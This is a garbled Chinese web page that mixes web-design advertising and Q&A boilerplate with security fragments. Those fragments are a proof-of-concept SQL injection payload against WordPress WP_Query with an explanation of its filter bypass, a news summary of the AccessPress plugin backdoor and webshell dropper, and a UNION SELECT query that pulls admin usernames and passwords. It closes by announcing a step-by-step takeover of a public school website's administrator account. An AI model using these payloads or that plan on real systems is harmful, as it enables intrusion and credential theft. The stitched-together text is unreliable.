重慶分公司,新征程啟航
為企業提供網站建設、域名注冊、服務器等服務
為企業提供網站建設、域名注冊、服務器等服務
進級到3.1.4 或者 3.2-RC3版本。
創新互聯是一家集網站建設,察哈爾右翼前企業網站建設,察哈爾右翼前品牌網站建設,網站定制,察哈爾右翼前網站建設報價,網絡營銷,網絡優化,察哈爾右翼前網站推廣為一體的創新建站企業,幫助傳統企業提升企業形象加強企業競爭力。可充分滿足這一群體相比中小企業更為豐富、高端、多元的互聯網需求。同時我們時刻保持專業、時尚、前沿,時刻以成就客戶成長自我,堅持不斷學習、思考、沉淀、凈化自己,讓我們為更多的企業打造出實用型網站。
injection]order=[SQL injection]
你的采納是我前進的動力,還有不懂的地方,請繼續“追問”。
如你還有別的問題,可另外向我求助;答題不易,互相理解,互相幫助。
POC:
POST
ecs_ajax_settings??{"post_id":1,"current_page":2,"widget_id":"65054a0","max_num_pages":5}
action?ecsload
query?{"tax_query":{"0":{"field":"term_taxonomy_id","terms":["111) and extractvalue(rand(),concat(0x5e,user(),0x5e))#"]}}
這個問題來源于temrs沒過濾 再加上 一個相等條件繞過;
相等條件類似于,下面過濾條件沒有執行。導致term攜帶了一些臟數據
if(a==b){
return;
}
sanialize(term);
1下圖所示,我們的插件里action鉤子勾住的是這個方法,這個方法利用了WP_QUERY存在漏洞的類,注意的是action 一定要有對應的值,所以這個漏洞限制在。運用了WP_QUERY的插件里。所以我們拿了ajax_pagnition這個插件,定義了action為ecsload
2 下圖所示 我們進入方法,此方法構造了sql
3 clean query方法 進去看看,2的里面調用了這個,箭頭指定的地方已經打過補丁,強制term為int所以就無法利用了,補丁前不是這樣,而是對term沒有做任何操作
4進入transform_query,在看一下里面。下面試sanitize其實可以繞過,從而不過濾term這樣,條件都成立,term逃出,sql成立
因為93 個 WordPress 主題和插件包含后門,從而使得攻擊者可以完全控制網站。攻擊者總共入侵了 AccessPress 的 40 個主題和 53 個插件,AccessPress 是 WordPress 插件的開發者,用于超過 360,000 個活動網站。
該攻擊是由 Jetpack 的研究人員發現的,Jetpack 是 WordPress 網站安全和優化工具的創建者,他們發現 PHP 后門已被添加到主題和插件中。
Jetpack 認為外部威脅攻擊者入侵了 AccessPress 網站以破壞軟件并感染更多的 WordPress 網站。
一旦管理員在他們的網站上安裝了一個受感染的 AccessPress 產品,就會在主主題目錄中添加一個新的“initial.php”文件,并將其包含在主“functions.php”文件中。該文件包含一個 base64 編碼的有效負載,它將 webshel l 寫入“./wp-includes/vars.php”文件。惡意代碼通過解碼并將其注入“vars.php”文件來完成后門安裝,實質上是讓攻擊者遠程控制受感染的站點。
檢測這種威脅的唯一方法是使用核心文件完整性監控解決方案,因為惡意軟件會刪除“initial.php”文件釋放器以掩蓋其蹤跡。
我受到影響嗎?
如果您在您的網站上安裝了其中一個受感染的插件或主題,則刪除/替換/更新它們不會根除任何可能通過它植入的 webshel l。
因此,建議網站管理員通過執行以下操作來掃描他們的網站是否存在入侵跡象:
Jetpack 提供了以下 YARA 規則,可用于檢查站點是否已被感染并檢測 dropper 和已安裝的 webshel l:
原文鏈接:PHP的93個WordPress插件有后門
select * form custom_order where custom_id = -1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
這樣注入惡意sql后,訂單列表頁顯示的就不是訂單信息了,而是數據庫中用戶的名稱和密碼,或者任意其它想要的信息。下面我們就按照這個原理來一步一步的獲取這個公立學校網站的管理員用戶名,管理員郵箱地址,通過郵箱重置管理員密碼,登錄超級管理員后臺。